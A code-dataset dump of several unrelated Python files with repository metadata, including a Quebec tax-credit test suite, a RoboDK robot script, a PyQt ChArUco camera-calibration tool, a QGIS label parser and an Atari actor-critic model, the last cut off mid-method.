def handle_action_endvar(self, line, start, end):
""" endvar """
self.parser.get_no_more_tokens(start, end)
self.parser.pop_nodestack()
self.parser.pop_handler()
ACTION_HANDLERS = {"var": VarActionHandler}
| 28.612903
| 92
| 0.653326
| 1,345
| 0.758174
| 0
| 0
| 0
| 0
| 0
| 0
| 397
| 0.223788
|
afa0c7a4dbfb00577736a7f5962a39c917e15a9e
| 1,623
|
py
|
Python
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-11-22T18:15:09.000Z
|
2021-11-22T18:15:09.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 3
|
2021-05-10T18:46:16.000Z
|
2021-06-01T16:51:48.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-05-05T17:20:06.000Z
|
2021-05-05T17:20:06.000Z
|
import pytest
from math import isclose
import sys
sys.path.append('/Users/pyann/Dropbox (CEDIA)/srd/Model')
import srd
from srd import quebec
# I use https://cffp.recherche.usherbrooke.ca/outils-ressources/guide-mesures-fiscales/credit-impot-prolongation-carriere/
# as a reference. Since the credit doesn't seem to adjust for taxable income
# (lines 37 and 38, grille de calcul), we add some non-work income to avoid a reduction.
@pytest.mark.parametrize('age, amount', [(59, 0), (60, 1500), (64, 1500),
(65, 1650), (70, 1650)])
def test_age(age, amount):
p = srd.Person(age=age, earn=30e3, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1500),
(34610, 1500), (64610, 0), (49610, 750)])
def test_work_inc_63(work_inc, amount):
p = srd.Person(age=63, earn=work_inc, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1650),
(34610, 1650), (67610, 0), ((34610+67610)/2, 825)])
def test_work_inc_66(work_inc, amount):
p = srd.Person(age=66, earn=work_inc, othtax=20e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
| 36.066667
| 123
| 0.637708
| 0
| 0
| 0
| 0
| 1,192
| 0.734442
| 0
| 0
| 365
| 0.224892
|
afa13b4e4fc345a627c690ebb66190bf2e512666
| 1,382
|
py
|
Python
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | 1
|
2019-05-23T14:26:21.000Z
|
2019-05-23T14:26:21.000Z
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
# Type help("robolink") or help("robodk") for more information
# Press F5 to run the script
# Documentation: https://robodk.com/doc/en/RoboDK-API.html
# Reference: https://robodk.com/doc/en/PythonAPI/index.html
# Note: It is not required to keep a copy of this file, your python script is saved with the station
from robolink import * # RoboDK's API
from robodk import * # Math toolbox for robots
# Start the RoboDK API:
RDK = Robolink()
# Get the robot item by name:
robot = RDK.Item('UR3', ITEM_TYPE_ROBOT)
# Get the reference target by name:
R = 100
for i in range(2):
target = RDK.Item('Target %s' % (i+1))
target_pose = target.Pose()
xyz_ref = target_pose.Pos()
# Move the robot to the reference point:
robot.MoveJ(target)
# Draw a hexagon around the reference target:
    for j in range(7):
        ang = j * 2 * pi / 6  # ang = 0, 60, 120, ..., 360 degrees, held in radians
# Calculate the new position around the reference:
x = xyz_ref[0] + R * cos(ang) # new X coordinate
y = xyz_ref[1] + R * sin(ang) # new Y coordinate
z = xyz_ref[2] # new Z coordinate
target_pose.setPos([x,y,z])
# Move to the new target:
robot.MoveL(target_pose)
# Trigger a program call at the end of the movement
# robot.RunCode('Program_Done')
# Move back to the reference target:
robot.MoveL(target)
| 32.139535
| 100
| 0.644718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 813
| 0.588278
|
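
A RoboDK-free sketch of the waypoint math used above: seven points on a circle of radius R around a reference, at 60-degree steps, where the first and last points coincide and close the hexagon.

```python
from math import pi, cos, sin

R = 100
xyz_ref = [0.0, 0.0, 0.0]  # placeholder reference position
waypoints = [(xyz_ref[0] + R * cos(i * 2 * pi / 6),
              xyz_ref[1] + R * sin(i * 2 * pi / 6),
              xyz_ref[2]) for i in range(7)]
```
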
afa16d72320b51ad48b9e7a6f4900aaa906c676a
| 101
|
py
|
Python
|
main.py
|
JesperKauppinen/dont-touch-the-spikes-clone
|
c5b0961fe8bbc0706191649bbae2d1784dd72e1d
|
[
"MIT"
] | null | null | null |
main.py
|
JesperKauppinen/dont-touch-the-spikes-clone
|
c5b0961fe8bbc0706191649bbae2d1784dd72e1d
|
[
"MIT"
] | null | null | null |
main.py
|
JesperKauppinen/dont-touch-the-spikes-clone
|
c5b0961fe8bbc0706191649bbae2d1784dd72e1d
|
[
"MIT"
] | null | null | null |
from game import Game
g = Game()
while g.running:
g.curr_menu.display_menu()
g.game_loop()
| 12.625
| 30
| 0.673267
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
afa2159b2cf1eb45a5549805ce6ddf7bf5854552
| 203
|
py
|
Python
|
pych_client/exceptions.py
|
dioptra-io/pych
|
46ff9cedb8fac6b35c8eaab442834d9ce190e43d
|
[
"MIT"
] | null | null | null |
pych_client/exceptions.py
|
dioptra-io/pych
|
46ff9cedb8fac6b35c8eaab442834d9ce190e43d
|
[
"MIT"
] | null | null | null |
pych_client/exceptions.py
|
dioptra-io/pych
|
46ff9cedb8fac6b35c8eaab442834d9ce190e43d
|
[
"MIT"
] | null | null | null |
class ClickHouseException(Exception):
def __init__(self, query: str, err: str):
err = "\n".join(err.split(". "))
msg = f"Query\n{query}\n\nError\n{err}"
super().__init__(msg)
| 33.833333
| 47
| 0.591133
| 202
| 0.995074
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.20197
|
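
Hypothetical usage of the ClickHouseException above; the query and error strings are made up to show the message formatting:

```python
try:
    raise ClickHouseException("SELECT 1", "Code: 62. Syntax error")
except ClickHouseException as exc:
    print(exc)
# Query
# SELECT 1
#
# Error
# Code: 62
# Syntax error
```
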
afa29bf04f32cf1f5c5165ddb76b18a6eec1cbfc
| 1,474
|
py
|
Python
|
ccdc/pixel.py
|
USGS-EROS/lcmap-gen
|
1be50eb316f7d737d6bbd000bd6a8b5006730928
|
[
"Unlicense"
] | 6
|
2018-07-09T00:33:52.000Z
|
2019-11-14T16:36:39.000Z
|
ccdc/pixel.py
|
USGS-EROS/lcmap-gen
|
1be50eb316f7d737d6bbd000bd6a8b5006730928
|
[
"Unlicense"
] | 1
|
2017-04-26T17:22:34.000Z
|
2017-04-26T17:38:59.000Z
|
ccdc/pixel.py
|
USGS-EROS/lcmap-gen
|
1be50eb316f7d737d6bbd000bd6a8b5006730928
|
[
"Unlicense"
] | 2
|
2018-06-11T17:59:03.000Z
|
2018-07-09T00:33:54.000Z
|
from ccdc import cassandra
from pyspark.sql.types import ArrayType
from pyspark.sql.types import ByteType
from pyspark.sql.types import IntegerType
from pyspark.sql.types import StructField
from pyspark.sql.types import StructType
def table():
"""Cassandra table name"""
return 'pixel'
def schema():
"""Schema for pixel dataframe"""
return StructType([
StructField('cx' , IntegerType(), nullable=False),
StructField('cy' , IntegerType(), nullable=False),
StructField('px' , IntegerType(), nullable=False),
StructField('py' , IntegerType(), nullable=False),
        StructField('mask' , ArrayType(ByteType()), nullable=True)])
def dataframe(ctx, ccd):
"""Create pixel dataframe from ccd dataframe
Args:
ctx: spark context
ccd: CCD dataframe
Returns:
dataframe conforming to pixel.py
"""
return ccd.select(schema().fieldNames())
def read(ctx, ids):
"""Read pixels
ctx: spark context
ids: dataframe of (cx, cy)
Returns:
dataframe conforming to pixel.schema()
"""
return ids.join(cassandra.read(ctx, table()),
on=['cx', 'cy'],
how='inner')
def write(ctx, df):
"""Write pixels
Args:
ctx: spark context
df : dataframe conforming to pixel.schema()
Returns:
df
"""
cassandra.write(ctx, df, table())
return df
| 22.333333
| 70
| 0.603121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 562
| 0.381275
|
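
Hypothetical usage of the pixel module above, assuming a Spark session `spark` configured with the spark-cassandra-connector; the id values are made up:

```python
from ccdc import pixel

ids = spark.createDataFrame([(1000, 2000)], ['cx', 'cy'])
pixels = pixel.read(spark, ids)   # inner-join ids against the 'pixel' table
pixel.write(spark, pixels)        # write rows back; returns the dataframe
```
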
afa4b7d2595f4e0c541626173ba9e42640a0a707
| 6,471
|
py
|
Python
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 4
|
2020-11-11T07:07:55.000Z
|
2022-02-22T02:39:01.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 2
|
2021-03-17T17:46:56.000Z
|
2021-03-18T08:19:04.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 1
|
2021-10-31T21:00:55.000Z
|
2021-10-31T21:00:55.000Z
|
from PyQt5.QtWidgets import QMainWindow
from ..ekmap_converter import eKConverter
import re
from qgis.core import QgsMessageLog
class LabelParser:
def __init__(self, labeling):
self.labeling = labeling
def _readTextStyle(self, settings):
labelFormat = settings.format()
field = settings.fieldName
finds = re.findall(r"\((.*?)\)", field)
if (len(finds) == 1):
field = finds[0]
xOffset = float(settings.xOffset)
yOffset = float(settings.yOffset)
offsetUnit = settings.offsetUnits
xOffset = eKConverter.convertUnitToPixel(value=xOffset, unit=offsetUnit)
yOffset = eKConverter.convertUnitToPixel(value=yOffset, unit=offsetUnit)
if xOffset == 0 and yOffset == 0:
yOffset = -1.5
fontName = labelFormat.font().family()
fontColor = labelFormat.color().name()
# fontStyle = labelFormat.namedStyle()
fontSize = float(labelFormat.size())
fontSizeUnit = labelFormat.sizeUnit()
# convert the size to pixel
fontSize = eKConverter.convertUnitToPixel(value = fontSize, unit = fontSizeUnit)
# Refer: https://qgis.org/api/classQgsTextBufferSettings.html
strokeColor = labelFormat.buffer().color().name()
strokeWidth = labelFormat.buffer().size()
strokeWidthUnit = labelFormat.buffer().sizeUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# TEMP
placement = settings.placement
placement = eKConverter.convertLabelPlacement(placement)
# Export information here
labelPaint = {
'text-color': fontColor,
'text-halo-color': strokeColor,
'text-halo-width': strokeWidth,
}
labelLayout = {
'text-font': [fontName],
'text-field': ["get", field],
'text-size': fontSize,
'text-offset': [xOffset, yOffset],
'text-anchor': self.__getAnchor(settings),
'text-rotate': self.__getRotation(settings),
'symbol-placement': placement,
}
return {
'type': 'symbol',
'paint': labelPaint,
'layout': labelLayout
}
def readZoomLevel(self, settings):
minLevel = 0
maxLevel = 22
if settings.scaleVisibility:
minLevel = eKConverter.convertScaleToLevel(scale = settings.minimumScale)
if settings.maximumScale != 0:
maxLevel = eKConverter.convertScaleToLevel(scale = settings.maximumScale)
# Export information here
return {
'minLevel': minLevel,
'maxLevel': maxLevel,
'visible': True
}
# Refer: https://qgis.org/pyqgis/3.0/core/Text/QgsTextBackgroundSettings.html
def readBackground(self, settings):
        background = settings.format().background()
if background.enabled():
# Identify the type of background
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a91794614626586cc1f3d861179cc26f9
# basic shape like: rectangle = 0,
# square = 1, eclipse = 2, circle = 3
# or svg image = 4
# or marker symbol = 5
backgroundType = background.type()
# Identify the type of size
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a45798d989b02e1dfcad9a6f1db4cd153
# 1 = buffer: the size of background = size of label + buffer
# 2 = fixed: the size of background = fixed
# 3 = percent: determine by the size of text size
# sizeType = background.sizeType()
# Get the size information
# this return QSizeF object
size = background.size()
width = size.width()
height = size.height()
# Identify the unit of size
sizeUnit = background.sizeUnit()
# then convert the size to pixel
width = eKConverter.convertUnitToPixel(value = width, unit = sizeUnit)
height = eKConverter.convertUnitToPixel(value = height, unit = sizeUnit)
# Get the fill and stroke
# apply for basic shape only
if backgroundType < 4:
# fillColor = background.fillColor().name()
# strokeColor = background.strokeColor().name()
strokeWidth = background.strokeWidth()
strokeWidthUnit = background.strokeWidthUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# Export information here
# ...
def readPlacement(self, settings):
layerType = settings.layerType()
# Refer: https://qgis.org/api/classQgsWkbTypes.html#a60e72c2f73cb07fdbcdbc2d5068b5d9c
# POINT
if layerType == 0:
# Point has: Cartographic (6),
# around point (0),
# offset from point (1)
a = 1
# LINESTRING
elif layerType == 1:
# Line has: Parallel, curved, horizontal
a = 2
# POLYGON
elif layerType == 2:
# Polygon has: Offset from point, horizontal,
# around centroid, free, using perimeter,
# using perimeter (curved), outside polygons
a = 3
def __getAnchor(self, settings):
placement = settings.placement
# Only offset from point has Anchor
if placement == 1:
quadOffset = settings.quadOffset
return eKConverter.convertQuadrantToAnchor(quadOffset)
# Other set default
else:
return 'bottom'
def __getRotation(self, settings):
# In-case user defined rotation:
definedProperties = settings.dataDefinedProperties()
LABEL_ROTATION = 96
rotationProperty = definedProperties.property(LABEL_ROTATION)
if rotationProperty.isActive():
fieldBase = rotationProperty.field()
return ['get', fieldBase]
else:
placement = settings.placement
# Only offset from point has Rotation
if placement == 1:
return settings.angleOffset
else:
return 0
| 36.767045
| 111
| 0.591871
| 6,339
| 0.979601
| 0
| 0
| 0
| 0
| 0
| 0
| 1,863
| 0.2879
|
afa690096a6121167933e215558dabc81606d2f3
| 8,069
|
py
|
Python
|
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# coding by liuyunfei
# 2020-4-12
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox
from PyQt5.QtCore import QThread, pyqtSignal, QDateTime, QObject, QMutexLocker, QMutex, QTimer
from PyQt5.QtGui import QPixmap
from PyQt5 import Qt, QtCore
from PyQt5.QtCore import QByteArray
from PyQt5.QtGui import QPixmap, QImage
import os
import cv2
import time
import glob
import numpy as np
from copy import deepcopy
from ui.ui import *
image_mutex = QMutex()
image = None
org_img = None
camera_mutex = QMutex()
num_i = 0
def cv2img_to_Qpixmap(frame):
if len(frame.shape) == 2:
cvRGBImg = cv2.cvtColor(frame,cv2.COLOR_GRAY2RGB)
elif len(frame.shape) == 3:
cvRGBImg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    h, w, c = cvRGBImg.shape
    qimg = QImage(cvRGBImg.data, w, h, c * w, QImage.Format_RGB888)
pixmap01 = QPixmap.fromImage(qimg)
pix = QPixmap(pixmap01)
return pix
class UpdateImg(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(UpdateImg, self).__init__()
self.image = None
def run(self):
fnames = glob.glob("imgs/*.png")
allCorners = []
allIds = []
for name in fnames:
im = cv2.imread(name,1)
dictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
            board = cv2.aruco.CharucoBoard_create(7, 9, .015, .0111, dictionary)  # square/marker sizes are in meters
corners, ids, rejected = cv2.aruco.detectMarkers(im, dictionary)
print(len(corners))
            if corners is None or len(corners) == 0:
continue
            ret, charucoCorners, charucoIds = cv2.aruco.interpolateCornersCharuco(corners, ids, im, board)  # the parameters here depend on the initial detections from detectMarkers
if corners is not None and charucoIds is not None:
if len(corners) == 31:
allCorners.append(charucoCorners)
allIds.append(charucoIds)
cv2.aruco.drawDetectedMarkers(im,corners,ids)
self.update_pix1.emit([im])
time.sleep(0.1)
w,h=im.shape[1],im.shape[0]
ret, K, dist_coef, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(allCorners, allIds, board,(w,h),None,None)
dist_coef = dist_coef[0]
txt = "Matrix =\n {0}\nDist_coef =\n {1}\n{2}\n{3}\n{4}\n{5}\n\n- {6}".format(K,dist_coef[0],dist_coef[1],\
dist_coef[2],dist_coef[3],dist_coef[4],"By:Liu Yunfei")
self.update_pix1.emit([None,txt])
class ColorImageThread(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(ColorImageThread, self).__init__()
def run(self):
global image
global image_mutex
while True:
image_mutex.lock()
img = deepcopy(image)
image_mutex.unlock()
if img is not None:
self.update_pix1.emit([img])
time.sleep(0.02)
class MyWindow(QMainWindow,Ui_Dialog):
def __init__(self, parent=None):
super(MyWindow, self).__init__(parent)
self.setupUi(self)
self.open_camera_button.clicked.connect(self.OnOpenCameraBtn)
self.capture_button.clicked.connect(self.OnCaptureBtn)
self.close_camera_button.clicked.connect(self.OnCloseCameraBtn)
self.cali_button.clicked.connect(self.OnCaliBtn)
self.set_button.clicked.connect(self.getSetInfo)
self.image_label.setScaledContents(False)
self.setWindowTitle("Camera Calibration using ChAruco by LiuYunfei")
self.timer = QTimer()
self.timer.timeout.connect(self.timerEvent)
self.camera_image = None
self.camera_no = 0
self.camera_width = 0
self.camera_height = 0
self.aruco_width = 0
self.aruco_height = 0
self.save_folder = ""
self.cap = None
self.sleep = False
self.getSetInfo()
def getSetInfo(self):
camera_no = self.lineEdit1.text()
camera_width = self.lineEdit2.text()
camera_height = self.lineEdit3.text()
aruco_width = self.lineEdit4.text()
aruco_height = self.lineEdit5.text()
self.camera_no = int(camera_no)
self.camera_width = int(camera_width)
self.camera_height = int(camera_height)
self.aruco_width = int(aruco_width)
self.aruco_height = int(aruco_height)
def timerEvent(self):
global image
global org_img
global image_mutex
        if not self.sleep:
time.sleep(2)
self.sleep = True
camera_mutex.lock()
ret,frame = self.cap.read()
camera_mutex.unlock()
if ret:
image_mutex.lock()
org_img = deepcopy(frame)
image_mutex.unlock()
dd = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
            board = cv2.aruco.CharucoBoard_create(self.aruco_width, self.aruco_height, .015, .0111, dd)  # square/marker sizes are in meters
corners, ids, rejected = cv2.aruco.detectMarkers(frame,dd)
            if corners is None or len(corners) == 0:
pass
else:
cv2.aruco.drawDetectedMarkers(frame,corners,ids)
image_mutex.lock()
image = deepcopy(frame)
image_mutex.unlock()
def updateColorImage(self,list_tmp):
img = list_tmp[0]
if img is not None:
qimg = cv2img_to_Qpixmap(img)
pix2 = qimg.scaled(800, 600, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
self.image_label.setPixmap(pix2)
if len(list_tmp) > 1:
text = list_tmp[1]
self.label_result.setText(text)
def OnOpenCameraBtn(self):
self.cap = cv2.VideoCapture(self.camera_no)
fps = self.cap.get(cv2.CAP_PROP_FPS)
print("FPS = {} fps".format(fps))
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH,self.camera_width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT,self.camera_height)
time.sleep(0.5)
self.timer.start(30)
self.updataImg = ColorImageThread()
self.updataImg.update_pix1.connect(self.updateColorImage)
self.uithread1 = QThread()
self.updataImg.moveToThread(self.uithread1)
self.uithread1.started.connect(self.updataImg.run)
self.uithread1.start()
def OnCaliBtn(self):
global image
global image_mutex
self.updateimg = UpdateImg()
self.updateimg.update_pix1.connect(self.updateColorImage)
self.ui2 = QThread()
self.updateimg.moveToThread(self.ui2)
self.ui2.started.connect(self.updateimg.run)
self.ui2.start()
def UpdateTimeUI(self,data):
self.label_result.setText(data)
def OnCaptureBtn(self):
global image
global image_mutex
global org_img
global num_i
image_mutex.lock()
img = deepcopy(org_img)
image_mutex.unlock()
name = "imgs/{}.png".format(num_i)
cv2.imwrite(name,img)
print("({}),img saved. {}".format(num_i,name))
num_i +=1
def OnCloseCameraBtn(self):
self.timer.stop()
self.updataImg.disconnect()
#self.updataImg.update_pix1.disconnect()
self.uithread1.terminate()
camera_mutex.lock()
self.cap.release()
camera_mutex.unlock()
if __name__ == '__main__':
app = QApplication(sys.argv)
myWin = MyWindow()
myWin.show()
sys.exit(app.exec_())
| 34.33617
| 137
| 0.587433
| 6,878
| 0.847775
| 0
| 0
| 0
| 0
| 0
| 0
| 396
| 0.048811
|
afaa3f5a9633f887b543c143ac5957ba0b5db6a8
| 145
|
py
|
Python
|
pythontraining/unittesting.py
|
srikanteswartalluri/pyutils
|
bf8d56ac9e9b0786861c08ef32eae49b021f20a3
|
[
"0BSD"
] | null | null | null |
pythontraining/unittesting.py
|
srikanteswartalluri/pyutils
|
bf8d56ac9e9b0786861c08ef32eae49b021f20a3
|
[
"0BSD"
] | null | null | null |
pythontraining/unittesting.py
|
srikanteswartalluri/pyutils
|
bf8d56ac9e9b0786861c08ef32eae49b021f20a3
|
[
"0BSD"
] | null | null | null |
__author__ = 'talluri'
def sum(*args):
if len(args) == 0:
return None
s = 0
for arg in args:
s += arg
return s
| 13.181818
| 22
| 0.496552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.062069
|
afaaa12bee233defec8a78a507b98355a9769f87
| 11,423
|
py
|
Python
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 10
|
2018-07-31T21:04:02.000Z
|
2022-02-03T18:58:45.000Z
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | null | null | null |
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 1
|
2018-08-01T18:09:35.000Z
|
2018-08-01T18:09:35.000Z
|
"""An implementation of an actor-critic model that is aimed at Atari games."""
import gym
import numpy as np
import tensorflow as tf
import actorcritic.nn as nn
from actorcritic.baselines import StateValueFunction
from actorcritic.model import ActorCriticModel
from actorcritic.policies import SoftmaxPolicy
class AtariModel(ActorCriticModel):
"""An :obj:`~actorcritic.model.ActorCriticModel` that follows the A3C and ACKTR paper.
The observations are sent to three convolutional layers followed by a fully connected layer, each using rectifier
activation functions (ReLU). The policy and the baseline use fully connected layers built on top of the last hidden
fully connected layer separately. The policy layer has one unit for each action and its outputs are used as logits
for a categorical distribution (softmax). The baseline layer has only one unit which represents its value.
The weights of the layers are orthogonally initialized.
Detailed network architecture:
- Conv2D: 32 filters 8x8, stride 4
- ReLU
- Conv2D: 64 filters 4x4, stride 2
- ReLU
- Conv2D: 64 filters 3x3, stride 1 (number of filters based on argument `conv3_num_filters`)
- Flatten
- Fully connected: 512 units
- ReLU
- Fully connected (policy): units = number of actions / Fully connected (baseline): 1 unit
A2C uses 64 filters in the third convolutional layer. ACKTR uses 32.
The policy is a :obj:`~actorcritic.policies.SoftmaxPolicy`.
The baseline is a :obj:`~actorcritic.baselines.StateValueFunction`.
See Also:
This network architecture was originally used in: https://www.nature.com/articles/nature14236
"""
def __init__(self, observation_space, action_space, conv3_num_filters=64, random_seed=None, name=None):
"""
Args:
observation_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`observations_placeholder` and the
:attr:`bootstrap_observations_placeholder`.
action_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`actions_placeholder`.
conv3_num_filters (:obj:`int`, optional):
Number of filters used for the third convolutional layer, defaults to 64. ACKTR uses 32.
random_seed (:obj:`int`, optional):
A random seed used for sampling from the `~actorcritic.policies.SoftmaxPolicy`.
name (:obj:`string`, optional):
A name for this model.
"""
super().__init__(observation_space, action_space)
assert isinstance(action_space, gym.spaces.Discrete)
assert isinstance(observation_space, gym.spaces.Box)
self._num_actions = action_space.n
self._conv3_num_filters = conv3_num_filters
self._name = name
# TODO
# used to convert the outputs of the policy and the baseline back to the batch-major format of the inputs
# because the values are flattened in between
with tf.name_scope('shapes'):
observations_shape = tf.shape(self.observations_placeholder)
with tf.name_scope('input_shape'):
input_shape = observations_shape[:2]
with tf.name_scope('batch_size'):
batch_size = input_shape[0]
with tf.name_scope('num_steps'):
num_steps = input_shape[1]
with tf.name_scope('bootstrap_input_shape'):
bootstrap_input_shape = tf.shape(self.bootstrap_observations_placeholder)[:1]
num_stack = observation_space.shape[-1]
# the observations are passed in uint8 to save memory and then converted to scalars in range [0,1] on the gpu
# by dividing by 255
with tf.name_scope('normalized_observations'):
normalized_observations = tf.cast(self.observations_placeholder, dtype=tf.float32) / 255.0
normalized_bootstrap_observations = tf.cast(self.bootstrap_observations_placeholder,
dtype=tf.float32) / 255.0
# convert from batch-major format [environment, step] to one flat vector [environment * step] by stacking the
# steps of each environment
# this is necessary since the neural network operations only support batch inputs
with tf.name_scope('flat_observations'):
self._flat_observations = tf.stop_gradient(
tf.reshape(normalized_observations, (-1,) + observation_space.shape))
flat_bootstrap_observations = tf.stop_gradient(
tf.reshape(normalized_bootstrap_observations, (-1,) + observation_space.shape))
with tf.variable_scope(self._name, 'AtariModel'):
self._params = dict()
# create parameters for all layers
self._build_params(num_input_channels=num_stack)
# create layers for the policy and the baseline that use the standard observations as input
self._preactivations, self._activations = self._build_layers(self._flat_observations, build_policy=True)
# create layers for the bootstrap values that use the next observations as input
_, bootstrap_activations = self._build_layers(flat_bootstrap_observations, build_policy=False)
with tf.name_scope('policy'):
policy_logits = tf.reshape(self._activations['fc_policy'], [batch_size, num_steps, self._num_actions])
self._policy = SoftmaxPolicy(policy_logits, self.actions_placeholder, random_seed)
with tf.name_scope('baseline'):
baseline_logits = tf.reshape(self._activations['fc_baseline'], input_shape)
self._baseline = StateValueFunction(baseline_logits)
with tf.name_scope('bootstrap_values'):
self._bootstrap_values = tf.reshape(bootstrap_activations['fc_baseline'], bootstrap_input_shape)
def _build_params(self, num_input_channels):
with tf.name_scope('initializers'):
# values of the initializers taken from original a2c implementation
weights_initializer = tf.orthogonal_initializer(np.sqrt(2.), dtype=tf.float32)
bias_initializer = tf.zeros_initializer(dtype=tf.float32)
policy_weights_initializer = tf.orthogonal_initializer(0.01, dtype=tf.float32)
baseline_weights_initializer = tf.orthogonal_initializer(1., dtype=tf.float32)
with tf.variable_scope('conv1'):
conv1_num_filters = 32
conv1_filter_extent = 8
self._params['conv1'] = nn.conv2d_params(
num_input_channels, conv1_num_filters, conv1_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv2'):
conv2_num_filters = 64
conv2_filter_extent = 4
self._params['conv2'] = nn.conv2d_params(
conv1_num_filters, conv2_num_filters, conv2_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv3'):
conv3_filter_extent = 3
self._params['conv3'] = nn.conv2d_params(
conv2_num_filters, self._conv3_num_filters, conv3_filter_extent, tf.float32,
weights_initializer, bias_initializer)
conv3_flat_size = 49 * self._conv3_num_filters # TODO don't hardcode
with tf.variable_scope('fc4'):
fc4_output_size = 512
self._params['fc4'] = nn.fully_connected_params(
conv3_flat_size, fc4_output_size, tf.float32, weights_initializer, bias_initializer)
with tf.variable_scope('fc_policy'):
self._params['fc_policy'] = nn.fully_connected_params(
fc4_output_size, self._num_actions, tf.float32, policy_weights_initializer, bias_initializer)
with tf.variable_scope('fc_baseline'):
self._params['fc_baseline'] = nn.fully_connected_params(
fc4_output_size, 1, tf.float32, baseline_weights_initializer, bias_initializer)
# noinspection PyShadowingBuiltins
def _build_layers(self, input, build_policy):
preactivations = dict()
activations = dict()
with tf.variable_scope('conv1', reuse=True):
conv1_pre = nn.conv2d(input, self._params['conv1'], stride=4, padding='VALID')
conv1 = tf.nn.relu(conv1_pre)
preactivations['conv1'] = conv1_pre
activations['conv1'] = conv1
with tf.variable_scope('conv2', reuse=True):
conv2_pre = nn.conv2d(conv1, self._params['conv2'], stride=2, padding='VALID')
conv2 = tf.nn.relu(conv2_pre)
preactivations['conv2'] = conv2_pre
activations['conv2'] = conv2
with tf.variable_scope('conv3', reuse=True):
conv3_pre = nn.conv2d(conv2, self._params['conv3'], stride=1, padding='VALID')
conv3 = tf.nn.relu(conv3_pre)
preactivations['conv3'] = conv3_pre
with tf.name_scope('flat'):
conv3_flat = nn.flatten(conv3)
activations['conv3'] = conv3_flat
with tf.variable_scope('fc4', reuse=True):
fc4_pre = nn.fully_connected(conv3_flat, self._params['fc4'])
fc4 = tf.nn.relu(fc4_pre)
preactivations['fc4'] = fc4_pre
activations['fc4'] = fc4
if build_policy:
with tf.variable_scope('fc_policy', reuse=True):
fc_policy = nn.fully_connected(fc4, self._params['fc_policy'])
activations['fc_policy'] = fc_policy
with tf.variable_scope('fc_baseline', reuse=True):
